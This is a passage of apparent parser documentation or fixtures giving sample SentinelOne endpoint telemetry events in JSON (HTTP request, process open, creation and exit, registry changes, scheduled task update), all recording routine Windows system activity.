"1eb51ea7407f41bc212cc699e37727ad6e6d52ec6746119ea066bd901f5e143b", - "md5": "0406e327338ccea5ef7dcf58268a8bfe" - }, - "fileLocation": "Local" - }, - "commandLine": "c:\\windows\\system32\\inetsrv\\w3wp.exe -ap \"STATISTIQUES\" -v \"v4.0\" -l \"webengine4.dll\" -a \\\\.\\pipe\\iisipm21bdf632-40c6-4b01-aa13-238d4c12d066 -h \"C:\\inetpub\\temp\\apppools\\STATISTIQUES\\STATISTIQUES.config\" -w \"\" -m 0 -t 20 -ta 0", - "fullPid": { - "pid": 3748, - "startTime": { - "millisecondsSinceEpoch": "1660716764710" - } - }, - "user": { - "name": "123\\foo.statistiques", - "sid": "S-1-5-21-4154652123-1702891081-745747720-13627" - }, - "interactive": "E_FALSE", - "parent": { - "node": { - "key": { - "value": "38A3CC9C5229D1BD" - } - }, - "fullPid": { - "startTime": {} - } - }, - "excluded": "E_FALSE", - "name": "IIS Worker Process", - "root": "E_TRUE", - "subsystem": "SYS_WIN32", - "integrityLevel": "HIGH", - "isWow64": "E_FALSE", - "isRedirectedCommandProcessor": "E_FALSE", - "trueContext": { - "key": { - "value": "07CF4F73FE08319F" - } - }, - "counters": { - "moduleLoad": 5585, - "fileCreation": 1960, - "fileDeletion": 34, - "fileModification": 4055, - "netConnOut": 96, - "dnsLookups": 72 - } - }, - "file": { - "node": { - "key": { - "value": "CA4F23B11D816C71" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "1660727671758" - }, - "path": "Anonymized Data", - "owner": {}, - "isDir": "E_FALSE", - "sizeBytes": "1075", - "hashes": { - "sha1": "9045966e5e375754d7789d487996d0314b5f77e1", - "sha256": "28cd1440f5b4f5c0d7cdbfbe4a02254cda1a87fbdddf3145faa4d5282d013f1d", - "md5": "2e63349a674acda41d8e1dcbff91b209" - }, - "fileLocation": "Local" - }, - "sizeBytes": "1075", - "isKernelModule": "E_FALSE", - "hashes": {}, - "oldHashes": {} - } - ``` - - - -=== "http" - - - ```json - { - "meta": { - "seqId": 1, - "uuid": "3d923fd8f09b44f4973579043a3c8df3", - "traceId": "33AEAAEA73CD4989976C65DA8123C361", - "agentVersion": "S1-WIN/21.5.7.370", - "osFamily": "windows", - "osName": "Windows 10 Pro", - "osRevision": "19043", - "computerName": "LAPTOP-TECH10", - "machineType": "laptop", - "mgmtUrl": "https://euce1-110-nfr.sentinelone.net" - }, - "timestamp": { - "millisecondsSinceEpoch": "1631784929904" - }, - "event_type": "http", - "trueContext": { - "key": { - "value": "A1FFB5A30161CDC0" - } - }, - "source": { - "node": { - "key": { - "value": "28C500988B415CA1" - } - }, - "executable": { - "node": { - "key": { - "value": "96C577BBA6378545" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "18446732429235951616" - }, - "path": "C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE", - "owner": {}, - "isDir": "E_FALSE", - "sizeBytes": "42156856", - "signature": { - "signed": { - "identity": "MICROSOFT CORPORATION", - "valid": {} - } - }, - "hashes": { - "sha1": "676b4e6a3c2c06fd7df3b83527a5570fd6687c8f", - "sha256": "97564d2938bebaaf1741fe5f675366cf1d8d3b6328fe38a5cf8e7133fe533ed1", - "md5": "bafa8a3a020648b57622e0b79104468a" - }, - "fileLocation": "Local" - }, - "commandLine": "\"C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE\"", - "fullPid": { - "pid": 14144, - "startTime": { - "millisecondsSinceEpoch": "1631775730819" - } - }, - "user": { - "name": "CORP\\m.benyounes", - "sid": "S-1-5-21-3542462677-1213864171-2030164332-6195" - }, - "interactive": "E_FALSE", - "parent": { - "node": { - "key": { - "value": "8299EFA6DE45855B" - } - }, - "fullPid": { - "startTime": {} - } - }, - "excluded": "E_FALSE", - "name": "Microsoft Outlook", - "root": "E_TRUE", - "subsystem": "SYS_WIN32", - "sessionId": 1, - "integrityLevel": "MEDIUM", - "isWow64": "E_FALSE", - "isRedirectedCommandProcessor": "E_FALSE", - "trueContext": { - "key": { - "value": "A1FFB5A30161CDC0" - } - }, - "counters": { - "modelChildProcess": 4, - "osChildProcess": 2, - "moduleLoad": 4102, - "fileCreation": 522, - "fileDeletion": 441, - "fileModification": 1211, - "netConnOut": 235, - "registryModification": 7596, - "dnsLookups": 81 - } - }, - "sourceType": "WININET", - "url": "https://automation.alticap.com/media/images/1548943185788.jpg?foo=bar#frag", - "method": "GET" - } - ``` - - - -=== "open_process" - - - ```json - { - "meta": { - "seqId": 63, - "uuid": "bcc4bf7a284441599707050e1d58a8dd", - "traceId": "CEBBC94D38B041B1B2DE01C315EB28F5", - "agentVersion": "S1-WIN/21.5.7.370", - "osFamily": "windows", - "osName": "Windows 10 Pro", - "osRevision": "19042", - "computerName": "LAPTOP-TECH15", - "machineType": "laptop", - "mgmtUrl": "https://euce1-110-nfr.sentinelone.net" - }, - "timestamp": { - "millisecondsSinceEpoch": "1631634712102" - }, - "event_type": "openProcess", - "source": { - "node": { - "key": { - "value": "2A2CC1C3468CB3D8" - } - }, - "executable": { - "node": { - "key": { - "value": "1F70F08D24687577" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "18446732429235951616" - }, - "path": "C:\\WINDOWS\\system32\\lsass.exe", - "owner": {}, - "isDir": "E_FALSE", - "sizeBytes": "59448", - "signature": { - "signed": { - "identity": "MICROSOFT WINDOWS PUBLISHER", - "valid": {} - } - }, - "hashes": { - "sha1": "28f7fb54c7bcd9d6e71669ea5bddf72ea65311ce", - "sha256": "362ab9743ff5d0f95831306a780fc3e418990f535013c80212dd85cb88ef7427", - "md5": "15a556def233f112d127025ab51ac2d3" - }, - "fileLocation": "Local" - }, - "commandLine": "C:\\WINDOWS\\system32\\lsass.exe", - "fullPid": { - "pid": 992, - "startTime": { - "millisecondsSinceEpoch": "1630919462523" - } - }, - "user": { - "name": "AUTORITE NT\\Syst\u00e8me", - "sid": "S-1-5-18" - }, - "interactive": "E_FALSE", - "parent": { - "node": { - "key": { - "value": "611EAD3E998CF40A" - } - }, - "executable": { - "node": { - "key": { - "value": "E2ABEBDC5F08F279" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "18446732429235951616" - }, - "path": "C:\\WINDOWS\\system32\\wininit.exe", - "owner": {}, - "isDir": "E_FALSE", - "sizeBytes": "419432", - "signature": { - "signed": { - "identity": "MICROSOFT WINDOWS PUBLISHER", - "valid": {} - } - }, - "hashes": { - "sha1": "915ea28bdaa9a2230ce52080693d7f7e27620ed5", - "sha256": "268ca325c8f12e68b6728ff24d6536030aab6e05603d0179033b1e51d8476d86", - "md5": "9ef51c8ad595c5e2a123c06ad39fccd7" - }, - "fileLocation": "Local" - }, - "commandLine": "wininit.exe", - "fullPid": { - "pid": 900, - "startTime": { - "millisecondsSinceEpoch": "1630919462470" - } - }, - "user": { - "name": "AUTORITE NT\\Syst\u00e8me", - "sid": "S-1-5-18" - }, - "interactive": "E_FALSE", - "parent": { - "node": { - "key": { - "value": "0D332A871A7DB912" - } - }, - "fullPid": { - "startTime": {} - } - }, - "excluded": "E_FALSE", - "name": "Windows Start-Up Application", - "root": "E_TRUE", - "subsystem": "SYS_WIN32", - "integrityLevel": "SYSTEM", - "isWow64": "E_FALSE", - "isRedirectedCommandProcessor": "E_FALSE", - "trueContext": { - "key": { - "value": "5318E7F038459CED" - } - } - }, - "excluded": "E_FALSE", - "name": "Local Security Authority Process", - "root": "E_TRUE", - "subsystem": "SYS_WIN32", - "integrityLevel": "SYSTEM", - "isWow64": "E_FALSE", - "isRedirectedCommandProcessor": "E_FALSE", - "trueContext": { - "key": { - "value": "A2DC49811AF8CC72" - } - }, - "counters": { - "crossProcess": 5262, - "moduleLoad": 222, - "netConnOut": 1813, - "crossProcessOutOfGroup": 5262, - "crossProcessOpenProcess": 5262, - "dnsLookups": 51 - } - }, - "target": { - "node": { - "key": { - "value": "E94742BA9CF1A186" - } - }, - "executable": { - "node": { - "key": { - "value": "23FF6C2F651EEA11" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "18446732429235951616" - }, - "path": "C:\\WINDOWS\\system32\\taskhostw.exe", - "owner": {}, - "isDir": "E_FALSE", - "sizeBytes": "97096", - "signature": { - "signed": { - "identity": "MICROSOFT WINDOWS", - "valid": {} - } - }, - "hashes": { - "sha1": "fed4b4a753a9541389aa670c69e624be07569ccd", - "sha256": "0322728dbce3a577c4a13b907ad7375d27e74880b63f7371384f67d19197a0ad", - "md5": "564e4806ab18f93b93d551cd10c1598e" - }, - "fileLocation": "Local" - }, - "commandLine": "taskhostw.exe Install $(Arg0)", - "fullPid": { - "pid": 15728, - "startTime": { - "millisecondsSinceEpoch": "1631634711621" - } - }, - "user": { - "name": "CORP\\j.varinot", - "sid": "S-1-5-21-3542462677-1213864171-2030164332-6152" - }, - "interactive": "E_FALSE", - "parent": { - "node": { - "key": { - "value": "399C73C0494DC82C" - } - }, - "executable": { - "node": { - "key": { - "value": "92BFF1D465C6BF8D" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "18446732429235951616" - }, - "path": "C:\\WINDOWS\\system32\\svchost.exe", - "owner": {}, - "isDir": "E_FALSE", - "sizeBytes": "57360", - "signature": { - "signed": { - "identity": "MICROSOFT WINDOWS PUBLISHER", - "valid": {} - } - }, - "hashes": { - "sha1": "010db07461e45b41c886192df6fd425ba8d42d82", - "sha256": "643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7", - "md5": "f586835082f632dc8d9404d83bc16316" - }, - "fileLocation": "Local" - }, - "commandLine": "C:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s Schedule", - "fullPid": { - "pid": 1928, - "startTime": { - "millisecondsSinceEpoch": "1630919463114" - } - }, - "user": { - "name": "AUTORITE NT\\Syst\u00e8me", - "sid": "S-1-5-18" - }, - "interactive": "E_FALSE", - "parent": { - "node": { - "key": { - "value": "D382137395ABA2C4" - } - }, - "fullPid": { - "startTime": {} - } - }, - "excluded": "E_FALSE", - "name": "Host Process for Windows Services", - "root": "E_TRUE", - "subsystem": "SYS_WIN32", - "integrityLevel": "SYSTEM", - "isWow64": "E_FALSE", - "isRedirectedCommandProcessor": "E_FALSE", - "trueContext": { - "key": { - "value": "4F9F0BD86D6CFE40" - } - }, - "counters": { - "modelChildProcess": 1596, - "osChildProcess": 1596, - "crossProcess": 63, - "moduleLoad": 81, - "crossProcessOutOfGroup": 63, - "crossProcessOpenProcess": 63 - } - }, - "excluded": "E_FALSE", - "name": "Host Process for Windows Tasks", - "root": "E_TRUE", - "subsystem": "SYS_WIN32", - "sessionId": 7, - "integrityLevel": "MEDIUM", - "isWow64": "E_FALSE", - "isRedirectedCommandProcessor": "E_FALSE", - "trueContext": { - "key": { - "value": "AB55C980E679578F" - } - }, - "counters": { - "moduleLoad": 44 - } - }, - "desiredAccess": 5240, - "relations": "PR_OTHER" - } - ``` - - - -=== "process_creation" - - - ```json - { - "meta": { - "seqId": 51, - "uuid": "19f22913365942f2afeed1463c96104b", - "traceId": "620565A45ABA475FB419254BE2152CA4", - "agentVersion": "S1-WIN/21.5.7.370", - "osFamily": "windows", - "osName": "Windows 10 Pro", - "osRevision": "19042", - "computerName": "LAPTOP-COM11", - "machineType": "laptop", - "mgmtUrl": "https://euce1-110-nfr.sentinelone.net" - }, - "timestamp": { - "millisecondsSinceEpoch": "1631630507153" - }, - "event_type": "processCreation", - "trueContext": { - "key": { - "value": "03E80496A6DE3247" - } - }, - "process": { - "node": { - "key": { - "value": "F85B96F9DB3700A5" - } - }, - "executable": { - "node": { - "key": { - "value": "7543AA6F061EE014" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "18446732429235951616" - }, - "path": "C:\\Windows\\System32\\taskhostw.exe", - "owner": {}, - "isDir": "E_FALSE", - "sizeBytes": "97096", - "signature": { - "signed": { - "identity": "MICROSOFT WINDOWS", - "valid": {} - } - }, - "hashes": { - "sha1": "fed4b4a753a9541389aa670c69e624be07569ccd", - "sha256": "0322728dbce3a577c4a13b907ad7375d27e74880b63f7371384f67d19197a0ad", - "md5": "564e4806ab18f93b93d551cd10c1598e" - }, - "fileLocation": "Local" - }, - "commandLine": "taskhostw.exe Install $(Arg0)", - "fullPid": { - "pid": 15104, - "startTime": { - "millisecondsSinceEpoch": "1631630506706" - } - }, - "user": { - "name": "CORP\\l.maoui", - "sid": "S-1-5-21-3542462677-1213864171-2030164332-6168" - }, - "interactive": "E_FALSE", - "parent": { - "node": { - "key": { - "value": "BAA63DA271B07548" - } - }, - "fullPid": { - "startTime": {} - } - }, - "excluded": "E_FALSE", - "name": "Host Process for Windows Tasks", - "root": "E_TRUE", - "subsystem": "SYS_WIN32", - "sessionId": 10, - "integrityLevel": "MEDIUM", - "isWow64": "E_FALSE", - "isRedirectedCommandProcessor": "E_FALSE", - "trueContext": { - "key": { - "value": "03E80496A6DE3247" - } - }, - "counters": { - "moduleLoad": 44 - } - }, - "parent": { - "node": { - "key": { - "value": "BAA63DA271B07548" - } - }, - "executable": { - "node": { - "key": { - "value": "03708471A478DAC3" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "18446732429235951616" - }, - "path": "C:\\Windows\\System32\\svchost.exe", - "owner": {}, - "isDir": "E_FALSE", - "sizeBytes": "57360", - "signature": { - "signed": { - "identity": "MICROSOFT WINDOWS PUBLISHER", - "valid": {} - } - }, - "hashes": { - "sha1": "010db07461e45b41c886192df6fd425ba8d42d82", - "sha256": "643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7", - "md5": "f586835082f632dc8d9404d83bc16316" - }, - "fileLocation": "Local" - }, - "commandLine": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule", - "fullPid": { - "pid": 1900, - "startTime": { - "millisecondsSinceEpoch": "1630857368855" - } - }, - "user": { - "name": "AUTORITE NT\\Syst\u00e8me", - "sid": "S-1-5-18" - }, - "interactive": "E_FALSE", - "parent": { - "node": { - "key": { - "value": "C36E5F6CB1EFE1FA" - } - }, - "fullPid": { - "startTime": {} - } - }, - "excluded": "E_FALSE", - "name": "Host Process for Windows Services", - "root": "E_TRUE", - "subsystem": "SYS_WIN32", - "integrityLevel": "SYSTEM", - "isWow64": "E_FALSE", - "isRedirectedCommandProcessor": "E_FALSE", - "trueContext": { - "key": { - "value": "A27D4C3AA2A4C77B" - } - }, - "counters": { - "modelChildProcess": 2096, - "osChildProcess": 2096, - "crossProcess": 324, - "moduleLoad": 80, - "crossProcessOutOfGroup": 324, - "crossProcessOpenProcess": 324 - } - }, - "hashes": { - "sha1": "fed4b4a753a9541389aa670c69e624be07569ccd", - "sha256": "0322728dbce3a577c4a13b907ad7375d27e74880b63f7371384f67d19197a0ad", - "md5": "564e4806ab18f93b93d551cd10c1598e" - }, - "signature": { - "signed": { - "identity": "MICROSOFT WINDOWS", - "valid": {} - } - } - } - ``` - - - -=== "process_exit" - - - ```json - { - "meta": { - "seqId": 102, - "uuid": "e4fb82d7034d4d8983f8f9e103aa394b", - "traceId": "AEA057B816964BDF82E0E2EC171B0C10", - "agentVersion": "S1-WIN/21.5.7.370", - "osFamily": "windows", - "osName": "Windows 10 Pro", - "osRevision": "19043", - "computerName": "LAPTOP-COM08", - "machineType": "laptop", - "mgmtUrl": "https://euce1-110-nfr.sentinelone.net" - }, - "timestamp": { - "millisecondsSinceEpoch": "1631634704684" - }, - "event_type": "processExit", - "trueContext": { - "key": { - "value": "3B49B9603DFF38C9" - } - }, - "source": { - "node": { - "key": { - "value": "03B4B5C3910B72FF" - } - }, - "executable": { - "node": { - "key": { - "value": "31E86945F742D096" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "18446732429235951616" - }, - "path": "C:\\WINDOWS\\System32\\wermgr.exe", - "owner": {}, - "isDir": "E_FALSE", - "sizeBytes": "228680", - "signature": { - "signed": { - "identity": "MICROSOFT WINDOWS", - "valid": {} - } - }, - "hashes": { - "sha1": "573ad9af63a6a0ab9b209ece518fd582b54cfef5", - "sha256": "1c09759dcd31fdc81bcd6685438d7efb34e0229f1096bfd57d41ecfe614d07dc", - "md5": "f7991343cf02ed92cb59f394e8b89f1f" - }, - "fileLocation": "Local" - }, - "commandLine": "C:\\WINDOWS\\system32\\wermgr.exe -upload", - "fullPid": { - "pid": 9876, - "startTime": { - "millisecondsSinceEpoch": "1631634703718" - } - }, - "user": { - "name": "AUTORITE NT\\Syst\u00e8me", - "sid": "S-1-5-18" - }, - "interactive": "E_FALSE", - "parent": { - "node": { - "key": { - "value": "6308FCA4876DA87C" - } - }, - "fullPid": { - "startTime": {} - } - }, - "excluded": "E_FALSE", - "name": "Windows Problem Reporting", - "root": "E_TRUE", - "subsystem": "SYS_WIN32", - "integrityLevel": "SYSTEM", - "isWow64": "E_FALSE", - "isRedirectedCommandProcessor": "E_FALSE", - "trueContext": { - "key": { - "value": "3B49B9603DFF38C9" - } - }, - "counters": { - "moduleLoad": 212 - } - }, - "parent": { - "node": { - "key": { - "value": "6308FCA4876DA87C" - } - }, - "executable": { - "node": { - "key": { - "value": "B10478282C996149" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "18446732429235951616" - }, - "path": "C:\\WINDOWS\\System32\\svchost.exe", - "owner": {}, - "isDir": "E_FALSE", - "sizeBytes": "57360", - "signature": { - "signed": { - "identity": "MICROSOFT WINDOWS PUBLISHER", - "valid": {} - } - }, - "hashes": { - "sha1": "010db07461e45b41c886192df6fd425ba8d42d82", - "sha256": "643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7", - "md5": "f586835082f632dc8d9404d83bc16316" - }, - "fileLocation": "Local" - }, - "commandLine": "C:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s Schedule", - "fullPid": { - "pid": 1744, - "startTime": { - "millisecondsSinceEpoch": "1631022021170" - } - }, - "user": { - "name": "AUTORITE NT\\Syst\u00e8me", - "sid": "S-1-5-18" - }, - "interactive": "E_FALSE", - "parent": { - "node": { - "key": { - "value": "6B6B39C296E3FD3D" - } - }, - "fullPid": { - "startTime": {} - } - }, - "excluded": "E_FALSE", - "name": "Host Process for Windows Services", - "root": "E_TRUE", - "subsystem": "SYS_WIN32", - "integrityLevel": "SYSTEM", - "isWow64": "E_FALSE", - "isRedirectedCommandProcessor": "E_FALSE", - "trueContext": { - "key": { - "value": "D4ADBE51EE6EC2D0" - } - }, - "counters": { - "modelChildProcess": 1095, - "osChildProcess": 1095, - "crossProcess": 39, - "moduleLoad": 80, - "crossProcessOutOfGroup": 39, - "crossProcessOpenProcess": 39 - } - } - } - ``` - - - -=== "reg_key_security_changed" - - - ```json - { - "meta": { - "seqId": 10, - "uuid": "bfd21e8929fd49768299fae02a0557a6", - "traceId": "7892FB424053407899299D5319FEB9C5", - "agentVersion": "S1-WIN/21.5.7.370", - "osFamily": "windows", - "osName": "Windows 10 Pro", - "osRevision": "19042", - "computerName": "LAPTOP-TECH19", - "machineType": "laptop", - "mgmtUrl": "https://euce1-110-nfr.sentinelone.net" - }, - "timestamp": { - "millisecondsSinceEpoch": "1631785108303" - }, - "event_type": "regKeySecurityChanged", - "trueContext": { - "key": { - "value": "D1A7307582B51DFF" - } - }, - "regKey": { - "key": {}, - "path": "MACHINE\\BCD00000000\\Objects\\{9dea862c-5cdd-4e70-acc1-f32b344d4795}\\Elements\\11000001" - }, - "securityInformation": 4, - "source": { - "node": { - "key": { - "value": "C02A3567256C6DE9" - } - }, - "executable": { - "node": { - "key": { - "value": "61D0DBC75EA434C4" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "18446732429235951616" - }, - "path": "C:\\Windows\\system32\\taskhostw.exe", - "owner": {}, - "isDir": "E_FALSE", - "sizeBytes": "97096", - "signature": { - "signed": { - "identity": "MICROSOFT WINDOWS", - "valid": {} - } - }, - "hashes": { - "sha1": "fed4b4a753a9541389aa670c69e624be07569ccd", - "sha256": "0322728dbce3a577c4a13b907ad7375d27e74880b63f7371384f67d19197a0ad", - "md5": "564e4806ab18f93b93d551cd10c1598e" - }, - "fileLocation": "Local" - }, - "commandLine": "taskhostw.exe", - "fullPid": { - "pid": 25104, - "startTime": { - "millisecondsSinceEpoch": "1631775524677" - } - }, - "user": { - "name": "CORP\\user.name", - "sid": "S-1-5-21-3542462677-1213864171-2030164332-6186" - }, - "interactive": "E_FALSE", - "parent": { - "node": { - "key": { - "value": "7A33A49AFDF1C571" - } - }, - "fullPid": { - "startTime": {} - } - }, - "excluded": "E_FALSE", - "name": "Host Process for Windows Tasks", - "root": "E_FALSE", - "subsystem": "SYS_WIN32", - "sessionId": 15, - "integrityLevel": "HIGH", - "isWow64": "E_FALSE", - "isRedirectedCommandProcessor": "E_FALSE", - "trueContext": { - "key": { - "value": "D1A7307582B51DFF" - } - }, - "counters": { - "moduleLoad": 52 - } - } - } - ``` - - - -=== "reg_value_create" - - - ```json - { - "meta": { - "seqId": 10, - "uuid": "bfd21e8929fd49768299fae02a0557a6", - "traceId": "7892FB424053407899299D5319FEB9C5", - "agentVersion": "S1-WIN/21.5.7.370", - "osFamily": "windows", - "osName": "Windows 10 Pro", - "osRevision": "19042", - "computerName": "LAPTOP-TECH19", - "machineType": "laptop", - "mgmtUrl": "https://euce1-110-nfr.sentinelone.net" - }, - "timestamp": { - "millisecondsSinceEpoch": "1631785108304" - }, - "event_type": "regValueCreate", - "trueContext": { - "key": { - "value": "D1A7307582B51DFF" - } - }, - "regValue": { - "key": {}, - "path": "MACHINE\\BCD00000000\\Objects\\{9dea862c-5cdd-4e70-acc1-f32b344d4795}\\Elements\\12000002\\Element" - }, - "valueType": 1, - "source": { - "node": { - "key": { - "value": "C02A3567256C6DE9" - } - }, - "executable": { - "node": { - "key": { - "value": "61D0DBC75EA434C4" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "18446732429235951616" - }, - "path": "C:\\Windows\\system32\\taskhostw.exe", - "owner": {}, - "isDir": "E_FALSE", - "sizeBytes": "97096", - "signature": { - "signed": { - "identity": "MICROSOFT WINDOWS", - "valid": {} - } - }, - "hashes": { - "sha1": "fed4b4a753a9541389aa670c69e624be07569ccd", - "sha256": "0322728dbce3a577c4a13b907ad7375d27e74880b63f7371384f67d19197a0ad", - "md5": "564e4806ab18f93b93d551cd10c1598e" - }, - "fileLocation": "Local" - }, - "commandLine": "taskhostw.exe", - "fullPid": { - "pid": 25104, - "startTime": { - "millisecondsSinceEpoch": "1631775524677" - } - }, - "user": { - "name": "CORP\\user.name", - "sid": "S-1-5-21-3542462677-1213864171-2030164332-6186" - }, - "interactive": "E_FALSE", - "parent": { - "node": { - "key": { - "value": "7A33A49AFDF1C571" - } - }, - "fullPid": { - "startTime": {} - } - }, - "excluded": "E_FALSE", - "name": "Host Process for Windows Tasks", - "root": "E_FALSE", - "subsystem": "SYS_WIN32", - "sessionId": 15, - "integrityLevel": "HIGH", - "isWow64": "E_FALSE", - "isRedirectedCommandProcessor": "E_FALSE", - "trueContext": { - "key": { - "value": "D1A7307582B51DFF" - } - }, - "counters": { - "moduleLoad": 52 - } - } - } - ``` - - - -=== "reg_value_delete" - - - ```json - { - "meta": { - "seqId": 43, - "uuid": "19f22913365942f2afeed1463c96104b", - "traceId": "63014A4A2D8B42148CBD53DA4C5937A8", - "agentVersion": "S1-WIN/21.5.7.370", - "osFamily": "windows", - "osName": "Windows 10 Pro", - "osRevision": "19042", - "computerName": "LAPTOP-COM11", - "machineType": "laptop", - "mgmtUrl": "https://euce1-110-nfr.sentinelone.net" - }, - "timestamp": { - "millisecondsSinceEpoch": "1631785105794" - }, - "event_type": "regValueDelete", - "trueContext": { - "key": { - "value": "6508114A467ECCA8" - } - }, - "regValue": { - "key": {}, - "path": "MACHINE\\SYSTEM\\ControlSet001\\Services\\SentinelDeviceControl\\Enum\\53" - }, - "source": { - "node": { - "key": { - "value": "1BA4624EB033A7CC" - } - }, - "executable": { - "node": { - "key": { - "value": "AC786EF3445E33CE" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "18446732429235951616" - }, - "path": "C:\\Windows\\System32\\ntoskrnl.exe", - "owner": {}, - "isDir": "E_FALSE", - "sizeBytes": "10848576", - "signature": { - "signed": { - "identity": "MICROSOFT WINDOWS", - "valid": {} - } - }, - "hashes": { - "sha1": "560b6a3b55112d9834e28def41d5ac3de0e03928" - } - }, - "fullPid": { - "pid": 4, - "startTime": { - "millisecondsSinceEpoch": "1631781067519" - } - }, - "user": { - "name": "SYSTEM" - }, - "interactive": "E_FALSE", - "parent": { - "node": { - "key": { - "value": "1BA4624EB033A7CC" - } - }, - "fullPid": { - "startTime": {} - } - }, - "excluded": "E_FALSE", - "name": "NT Kernel & System", - "root": "E_TRUE", - "subsystem": "SYS_WIN32", - "integrityLevel": "SYSTEM", - "isWow64": "E_FALSE", - "isRedirectedCommandProcessor": "E_FALSE", - "trueContext": { - "key": { - "value": "6508114A467ECCA8" - } - }, - "counters": { - "modelChildProcess": 2, - "osChildProcess": 2, - "fileModification": 1, - "netConnIn": 16, - "netConnOut": 26 - } - } - } - ``` - - - -=== "reg_value_modified" - - - ```json - { - "meta": { - "seqId": 133, - "uuid": "4d311e18709146cba8797a22e3c20762", - "traceId": "8D9114CB762D473FAA5189BD13762FB2", - "agentVersion": "S1-WIN/21.5.7.370", - "osFamily": "windows", - "osName": "Windows 10 Pro", - "osRevision": "19042", - "computerName": "LAPTOP-COM13", - "machineType": "laptop", - "mgmtUrl": "https://euce1-110-nfr.sentinelone.net" - }, - "timestamp": { - "millisecondsSinceEpoch": "1631785156204" - }, - "event_type": "regValueModified", - "trueContext": { - "key": { - "value": "B3E0EF7ECFD0D296" - } - }, - "regValue": { - "key": {}, - "path": "MACHINE\\SYSTEM\\ControlSet001\\Control\\Class\\{4d36e96c-e325-11ce-bfc1-08002be10318}\\0003\\GlobalSettings\\AnalogDigitalCapture\\Node000\\Chan001" - }, - "oldValueType": 1, - "newValueType": 3, - "source": { - "node": { - "key": { - "value": "645A938883C36D21" - } - }, - "executable": { - "node": { - "key": { - "value": "294CA423F5D3A1E5" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "18446732429235951616" - }, - "path": "C:\\Windows\\System32\\svchost.exe", - "owner": {}, - "isDir": "E_FALSE", - "sizeBytes": "57360", - "signature": { - "signed": { - "identity": "MICROSOFT WINDOWS PUBLISHER", - "valid": {} - } - }, - "hashes": { - "sha1": "010db07461e45b41c886192df6fd425ba8d42d82", - "sha256": "643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7", - "md5": "f586835082f632dc8d9404d83bc16316" - }, - "fileLocation": "Local" - }, - "commandLine": "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted -p", - "fullPid": { - "pid": 3504, - "startTime": { - "millisecondsSinceEpoch": "1631625850355" - } - }, - "user": { - "name": "AUTORITE NT\\SERVICE LOCAL", - "sid": "S-1-5-19" - }, - "interactive": "E_FALSE", - "parent": { - "node": { - "key": { - "value": "DEF87C2AB48B84DC" - } - }, - "fullPid": { - "startTime": {} - } - }, - "excluded": "E_FALSE", - "name": "Host Process for Windows Services", - "root": "E_TRUE", - "subsystem": "SYS_WIN32", - "integrityLevel": "SYSTEM", - "isWow64": "E_FALSE", - "isRedirectedCommandProcessor": "E_FALSE", - "trueContext": { - "key": { - "value": "B3E0EF7ECFD0D296" - } - }, - "counters": { - "modelChildProcess": 25, - "osChildProcess": 25, - "moduleLoad": 87 - } - }, - "oldValueData": "00C0F0FF", - "newValueData": "0040EEFF" - } - ``` - - - -=== "sched_task_update" - - - ```json - { - "meta": { - "seqId": 63, - "uuid": "bcc4bf7a284441599707050e1d58a8dd", - "traceId": "CEBBC94D38B041B1B2DE01C315EB28F5", - "agentVersion": "S1-WIN/21.5.7.370", - "osFamily": "windows", - "osName": "Windows 10 Pro", - "osRevision": "19042", - "computerName": "LAPTOP-TECH15", - "machineType": "laptop", - "mgmtUrl": "https://euce1-110-nfr.sentinelone.net" - }, - "timestamp": { - "millisecondsSinceEpoch": "1631634708620" - }, - "event_type": "schedTaskUpdate", - "trueContext": { - "key": { - "value": "4FE2F2ADB5655DDF" - } - }, - "taskName": "\\Microsoft\\Windows\\UpdateOrchestrator\\Schedule Maintenance Work", - "source": { - "node": { - "key": { - "value": "38F2355042BA2367" - } - }, - "executable": { - "node": { - "key": { - "value": "99892497510C239E" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "18446732429235951616" - }, - "path": "C:\\WINDOWS\\system32\\MoUsoCoreWorker.exe", - "owner": {}, - "isDir": "E_FALSE", - "sizeBytes": "1614848", - "signature": { - "signed": { - "identity": "MICROSOFT WINDOWS", - "valid": {} - } - }, - "hashes": { - "sha1": "a5a6716e38b06d44f4803b5167db2a0862b1d6bf", - "sha256": "a250e2af9b662d6a81552178ac7514e81032c5a4b7031666f8e777f597ea5a9d", - "md5": "475c5e07f8375dab6e5888301b1705e6" - }, - "fileLocation": "Local" - }, - "commandLine": "C:\\Windows\\System32\\mousocoreworker.exe -Embedding", - "fullPid": { - "pid": 8588, - "startTime": { - "millisecondsSinceEpoch": "1631289768083" - } - }, - "user": { - "name": "AUTORITE NT\\Syst\u00e8me", - "sid": "S-1-5-18" - }, - "interactive": "E_FALSE", - "parent": { - "node": { - "key": { - "value": "B485A24CFF4A8D31" - } - }, - "fullPid": { - "startTime": {} - } - }, - "excluded": "E_FALSE", - "name": "MoUSO Core Worker Process", - "root": "E_TRUE", - "subsystem": "SYS_WIN32", - "integrityLevel": "SYSTEM", - "isWow64": "E_FALSE", - "isRedirectedCommandProcessor": "E_FALSE", - "trueContext": { - "key": { - "value": "4FE2F2ADB5655DDF" - } - }, - "counters": { - "modelChildProcess": 1, - "osChildProcess": 1, - "moduleLoad": 1158, - "netConnOut": 7, - "dnsLookups": 1 - } - } 